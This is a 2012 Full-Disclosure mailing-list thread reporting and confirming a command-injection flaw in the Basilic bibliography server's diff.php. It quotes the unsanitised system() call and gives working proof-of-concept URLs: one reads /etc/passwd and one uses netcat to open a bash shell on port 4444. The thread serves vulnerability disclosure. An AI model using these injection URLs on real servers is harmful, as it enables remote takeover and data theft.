Thank you for confirming that, and providing an even sup3r c00ler POC. I have always wondered how nc works, and combined with system, it seems it makes a super exciting vulnerability.
On Fri, Jul 6, 2012 at 5:32 PM, larry Cashdollar <[email protected]> wrote: > verified, http://artis.imag.fr/Software/Basilic/ > > http://127.0.0.1/basilic/Config/diff.php?file=%26nc%20-ltp4444%20-e%20/bin/bash&new=1&old=2 > > for an interactive shell on port 4444. Neat. > > line 39 of diff.php is > > system("diff ../$_GET[old]/$_GET[file] $_GET[new]/$_GET[file] | sed > s%\"<\"%\"\<\"%g | sed s%\">\"%\"\>\"%g"); > > > On Jun 30, 2012, at 01:45 PM, [email protected] wrote: > > Hi > Dear Sir > > Basilic is an Automated Bibliography Server for Research Publications > Diffusion that use by many research center. > there is a RCE bug in basilic/Config/diff.php s could allow an attacker to > run system command in server. > sample: > http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2 > > Regards > M.Razavi > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
